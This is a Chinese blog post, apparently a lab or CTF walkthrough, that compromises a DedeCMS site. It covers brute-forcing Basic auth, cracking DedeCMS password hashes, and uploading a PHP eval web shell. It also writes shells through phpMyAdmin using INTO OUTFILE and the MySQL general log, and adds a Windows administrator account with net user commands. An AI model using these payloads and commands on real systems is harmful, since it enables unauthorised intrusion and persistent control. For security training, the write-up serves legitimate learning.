DEDECMS-案例分析

最新推荐文章于 2024-09-02 14:28:46 发布
最新推荐文章于 2024-09-02 14:28:46 发布
阅读量952 收藏 15
点赞数 24
文章标签: 服务器 前端 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46003602/article/details/140993663
版权

DEDECMS-案例分析

1、信息采集

通过Wappalyzer获取CMS、操作系统、编程语言和数据库管理器等信息

image-20240806163507969

御剑目录扫描

image-20240806164239090

并未扫描到任何信息,大概率是认证问题

image-20240806164358033

输入账号密码抓个包看看

image-20240806163451912

image-20240806164615648

Basic认证
Basic认证过程简单介绍

浏览器请求一个需要认证的网页。
服务器向浏览器返回“401 Unauthorized(未认证)”状态码。
浏览器收到此状态码后,询问用户名和密码。
浏览器发送附带认证信息(Authorization头信息)的请求。
本次请求得到了文档(用户名密码均正确的情况下) 。

其中YWRtaW46MTIzusername:password(admin:123)经过base64加密得到的结果

2、弱口令爆破

这里就要尝试一些fuzz爆破

playload格式 用户名字典+ :+密码字典,对有效载荷处理添加base64编码

image-20240806165655516

image-20240806165710661

可以看到一个200响应,base64解码后得到账号密码

image-20240806165903464

image-20240806170001786

登陆得到key1

image-20240806170028433

目录扫描可以用BP抓包,加上御剑的字典爆破

注意一定不要选择有效载荷编码

image-20240806170645031

将结果保存为txt文档

image-20240806170953220

进入key.txt,得到key2

image-20240806171101946

前面信息采集的时候就已经知道了数据库管理器是phpMyAdmin

image-20240806171343107

还是尝试一下fuzz爆破,通过弱口令检查工具得到数据库用户名和密码,所以说这个admin就是一个干扰选项

image-20240806174002178

进入数据库后台后找到admin的密码,到这一部的时候就又要用我们前面的信息,CMS是DedeCMS,那么就有个特点,dede 的密码怎么破解,dede后台。32位的DEDE密码如何破解

dede 的密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5。
比如我的数据库的密文是:cca77804d2ba1922c33e

得到20 MD5密码,方法是,前减3后减1,得到16位MD5

这样执行后就是77804d2ba1922c33

直接md5解密:888888

image-20240806174224105

image-20240806175047530

可以正常进入后台

image-20240806180028172

文件上传 getshell

在后台上传一个png类型文件,写入马,改后缀

image-20240806191010689

在附件数据管理中找到上传文件路径

image-20240806191319223

可以正常执行,蚁剑添加Authorized头部可以正常连接

image-20240806191239112

image-20240806191449174

phpMyAdmin get shell

参考文章:https://xz.aliyun.com/t/3283

(1) 直接写shell

前提三个条件:对web目录具有写入条件(dba用户)、知道网站的路径(探针phpinfo、报错、目录扫描等等)、secure_file_pri要具有导出权限,需要为空或者具体的一个web路径

查询secure_file_priv的值,当前为空

select @@secure_file_priv;
show GLOBAL VARIABLES like '%secure_file%';

image-20240806200041169

查找路径

SELECT @@basedir;

image-20240806200111959

SELECT '<?php eval($_POST[x]); ?>' INTO OUTFILE 'C:/phpStudy/MySQL/xiaodisec.php';

在蚁剑上可以看到已经上传了,知道路径就可以利用(可以根据MYSQL路径猜网站根目录,后面说)

image-20240806201209175

(2) 日志文件写shell

因为在mysql5.0以上,mysql官方把secure_file_pri参数默认设为NULL,所以无法进行导入导出,mysql有日志功能可以优化SQL语句

  1. 查询mysql日志功能是否开启
SHOW VARIABLES LIKE '%general%'

General_log 表示日志功能是否打开

General_log_file 代表日志存储的位置

image-20240806180718588

  1. 修改日志功能开头以及日志位置
SET GLOBAL general_log = on;
SET GLOBAL general_log_file='C:/phpStudy/MySQL/xiaodisec.php';
SELECT '<?php @eval($_POST[x]);?>';

image-20240806203348715

  1. 根据前面查到的日志路径可以判断,这个网站是小皮搭建的,大差不差就能猜到网站路径
C:/phpStudy/www
SET GLOBAL general_log_file='C:/phpStudy/www/xiaodisec.php'

image-20240806204150113

image-20240806204332153

image-20240806204426234

远程连接

先用nmap查看是否开启远程连接

nmap -p 3389 10.0.0.163

image-20240806190449206

在御剑命令行中能看到当前为管理员用户

image-20240806193526086

但是很明显账号不匹配(与admin,888888)这个数据库后台管理员

net user xiaodi 123456 /add
net localgroup administrators xiaodi /add
net localgroup administrators

image-20240806193837422

添加管理员用户成功

image-20240806194221144

远程连接失败的原因

远程桌面失败也有很多其他原因,例如:
1.攻击机与目标机是否连通,ping命令即可验证。
2.目标机器是否开启了远程桌面服务
3.kali中/etc/ssh/sshd_config文件,X11 forwarding 是否设置为 yes?
4.也有博主说kali默认安装的rdesktop容易出现问题,卸载,重装。apt-get remove/install rdesktop 两条命令即可!
小小乐安全
关注
  • 24
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dedecms织梦系统在线报名表单插件安装及配置详细教程
csdn_666888的博客
06-08 7307
网上找了很多,都不是太满意,功能不全不全不说,还没有详细的安装配置教程,经过自己的折腾,成功了修改程序并配置成功,亲测,试用没有问题!所以,决定给大家出一个针对新手的详细教程。废话不多,直接上干货。一步一步带你操作,还有图片演示哟~【注意是UTF-8编码】1、打开织梦后台,点击模块==》模块生成向导(具体看图选择就行)2、安装程序(复制下面SQL语句粘贴就好)DROP TALBE IF EXIST...
dede织梦网站源码安装教程
weixin_42460505的博客
05-30 2490
划重点!! 首先,要明确自己的空间是否支持PHP+Mysq。第一步: 将下载的源码解压后传到空间或者本地服务器。注意!!!!必须安装到根目录!!!!!! 由于有很多人反应安装后首页样式都乱的,所以强烈要求安装到根目录,如:127.0.0.1 / www.xxx.com,或者二级域名也可以,但不要安装到二级目录,如:127.0.0.1/www1/ 第二步:输入域名 http://www.***...
dedecms /plus/search.php SQL Injection && Local Variable Overriding
weixin_33714884的博客
05-15 182
catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考   1. 漏洞描述 这个文件有两处注入漏洞 1. $typeid变量覆盖导致ChannelTypeid被强制改变: 低风险 2. $typeArr的本地变量覆盖注入+$typeid变量覆盖导致SQL注入: 高风险 Relevant Li...
织梦教程:如何用dedecms织梦模板搭建网站?
热门推荐
fghrscv的博客
06-22 1万+
如何用dedecms织梦模板搭建网站?目前,dedecms织梦程序是互联网很多新手站长建站用的比较多的,它的安装过程比较简单,代码修改也没那么复杂,可以进行二次开发,加上有一定的知名度,在网上可以找到很多资源! 安装dede模板方法有多种,织梦模板之家将最通用的dede模板安装方法,编制成教程奉献给所有织梦模板之家的空间用户。 由于模板作者的制作方法和习惯各有不同,dede
DedeCMS(CVE-2019-8933)
m0_74559567的博客
03-15 895
密码就是在字典里面,但是我们发现并没有爆破成功,原因是请求过快,输入错误的时候网页会跳转错误页面然后再返回再次登录。查看源代码,找到验证码的url,当然也可以右键打开验证码链接,或者直接拖就可以。然后再次开始攻击,攻击完成后,排序长度,不一样的基本是成功的。返回Bp插件界面,然后右键导入模板,填入接口url。payload1的位置,添加常用的密码字典进行爆破。点击浏览,是可以被成功解析的,使用蚁剑进行连接。payload2位置,选择的是验证码的插件。抓包验证码的网页后,右键发送到插件。
dedecms讲解
beyond__devil的博客
10-12 1238
最近,辞职了,可能当个讲师,给老师的培训机构分享一些东西,此篇是dedecms,好久以前搞的,今天花时间又看了看: dedecms首页文件,以及所有相关文件引入的分析,核心是:dedecms的模板解析,解析简单写了下: dedecms开发手册:     http://help.dedecms.com - 里面各种教程很丰富     http://help.dedecms.com/v53
基于PHP的Dedecms管理员账号密码重置php文件(dedecms源码.zip
08-13
Dedecms案例中,PHP用于处理后台逻辑,包括用户认证、数据交互和页面渲染等。 Dedecms(织梦内容管理系统)是一款基于PHP和MySQL的开源CMS系统,它提供了一套完整的网站建设和管理解决方案,包括文章、图片、下载...
前端学生作业毕设实训素材-化妆品官网美容网站化妆品网站dedecms模板.rar
04-07
这个压缩包中的内容,为学生提供了一个实际的项目案例,有助于他们实践并提升前端开发技能。 3. **论文**:在毕业设计过程中,学生通常需要撰写论文,阐述设计的目标、方法、实现过程及结果分析。这个模板可能帮助...
【T183】大气钢结构行业集团公司网站dedecms模板.zip
09-24
2. **模块化结构**:DEDECMS的模块化特性使得模板可以灵活地添加、修改或删除各个部分,如公司简介、产品展示、新闻动态、案例展示等,方便企业根据实际需求定制内容。 3. **SEO优化**:作为一款专业的CMS,DEDECMS...
手机wrap网站基于dedecms仿长沙美奥口腔医院手机wap医院网站源码
02-25
### 三、长沙美奥口腔医院案例分析 #### 3.1 长沙美奥口腔医院简介 长沙美奥口腔医院是一家专注于口腔医疗服务的专业机构,提供包括牙齿矫正、种植牙、美容修复等多种服务项目。该医院以其专业的技术团队和先进的...
ASP网站CMS程序源码——动易数据转DedeCms2007_petodede实例开发.zip
10-17
在这个特定的案例中,我们讨论的是一个基于ASP的网站内容管理系统(CMS)源码,用于将动易的数据转换到DedeCms2007系统中。这涉及到两个主要的知识点:ASP编程和内容管理系统的数据迁移。 首先,ASP编程基础是理解...
Dedecms学习(1)
Shelly Long的博客
06-23 665
建站工具    dw,ps,火狐,fire bug扩展本地环境    phpstudy本地程序安装(Dedecms)    http://www.dedecms.com/下载utf8版本    我们只需要uploads下面的文件,把该目录下的所有文件复制到本地环境www下面-》安装进入后台-》生成-》更新主页HTML-》更新主页HTML-》浏览认识网站及页面下载    以www.zjjiashan...
织梦dede5.7数据表及其注释
咖啡味的小认真
12-21 640
Document Dedecms5.7数据结构说明文档 1、dede_addonarticle:附加文章表 表名:dede_addonarticle(ENGINE=MyISAM/CHARSET=utf8)|说明:附加文章表 字段名 说明描述 具体参数 aid 文章ID mediumint(8) unsigned NOT NULL default ‘0’ typeid 栏目ID smallint(5) unsigned NOT NULL def...
Dedecms V6 来了!
overczzz的专栏
11-02 3488
DEDECMS焕新来袭! 2020年11月1日!dedecms官网更新,系统更新! 老deder们,速来报道! 目前官网已经改版,访问www.dedecms.com或者www.dedebiz.com可获得最新版dede V6! 同时,dede官方也推出了新的商业授权计划和开发平台! 喜欢的粉丝速来看! 笔者第一时间已经安装了正式版! 前后台样式都有调整 外观改动不是特别大,具体的程序文件和功能方面的变动,各位可以下载安装进一步测试! 增加了更新TAG标...
DEDECMS是一个什么样的系统?
缘 源 园
01-26 1661
DEDECMS介绍: DedeCMS是内容系统管理软件,是国内最专业的PHP网站内容管理系统-=织梦内容管理系统 使用dedecMS建站的好处: 1.加快开发的速度,技术难度小 2.可视化的内容管理系统,便于操作 3.模板自定义简单又方便 4.充分考虑SEO的优化 5.管理网站,快捷方便 6.控制用户权限.可以多人维护 7.dedecMS自带搜索功能 8.具有较好的安全稳定性 DedecMS应用领域 企业网站 政府机关 教育机构 媒体机构 行业网络 个人站长 收费网站 DedecMS..
学习dedecms的一些操作
resilient的博客
07-19 518
1.到官网下载dedecms 下载地址http://www.dedecms.com/   2.解压项目 删除不需要的一些文件只留需要的 3.项目跑起来后 首页的一些导航栏点击 提示没有url 原因是没有生成相关栏目的模板文件   点击开始生成html   再次访问导航栏就能访问了   4.需要修改网页风格 或者一些部分 直接在默认首页模块下改 ...
构建专业工作室网站:黑色大气DedeCMS模板
最新发布
weixin_36213081的博客
09-02 1367
本文还有配套的精品资源,点击获取 简介:本模板基于PHP和MySQL的织梦内容管理系统,专为打造具有黑色专业风格的工作室网站设计。它采用UTF-8编码,确保国际化内容显示无碍。包含首页、内容页、列表页、栏目页、导航菜单、CSS样式、JavaScript脚本及媒体文件等,用户可以通过后台设置和代码自定义来实现个性化网站。了解PHP和HTML,熟悉DedeCMS操作是使用本模板...
织梦DEDECMS无简略标题显示完整标题的实现代码
毛兴宇
07-23 639
织梦DedeCMS的简略标题功能还是挺方便的,为我们站长考虑了很多,适合一些对标题长度有要求的站点,有些新闻站点需要长标题和简略标题,目前的调用只能同时调用一种标题方式,不过可以采用以下方法,进行判断,无简略标题显示完整标题。例如dedecms早期版本中的”有来源显示来源,无来源不显示”、”有作者显示作者,无作者不显示”。 方法一: {dede:field name='array' runphp=
dedecms-v5.7-utf8-sp2
07-30
dedecms-v5.7-utf8-sp2是一个基于PHP开发的开源CMS系统。 dedecms具有良好的扩展性和易用性,适用于中小型网站的构建和管理。 v5.7-utf8-sp2是dedecms的一个特定版本,其中v5.7表示主要版本号,utf8表示该版本支持UTF-8编码,sp2表示此版本的第2次升级。 dedecms-v5.7-utf8-sp2拥有许多有用的功能,如内容管理、会员管理、模块扩展等。通过dedecms,用户可以方便地创建网站、发布和管理内容,包括文章、图片、音频、视频等。其中,内容管理模块提供了灵活的分类和标签系统,允许用户管理和展示各种类型的内容。会员管理模块则提供了会员注册、登录、权限设置等功能,方便用户管理网站的访问和权限控制。此外,dedecms还支持第三方模块和插件的集成,可以通过扩展模块来增强系统功能。 dedecms-v5.7-utf8-sp2还具有良好的性能和安全性。它采用了优化的代码结构和缓存机制,以提高页面加载速度和响应能力。同时,dedecms-v5.7-utf8-sp2还提供了一系列的用户权限和安全策略,如登录验证、密码加密等,以保护用户数据和网站安全。 总之,dedecms-v5.7-utf8-sp2是一个功能强大、易于使用和安全可靠的开源CMS系统,适用于中小型网站的建设和管理。它通过丰富的功能和灵活的扩展性,帮助用户快速构建和管理网站,并提供良好的用户体验。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值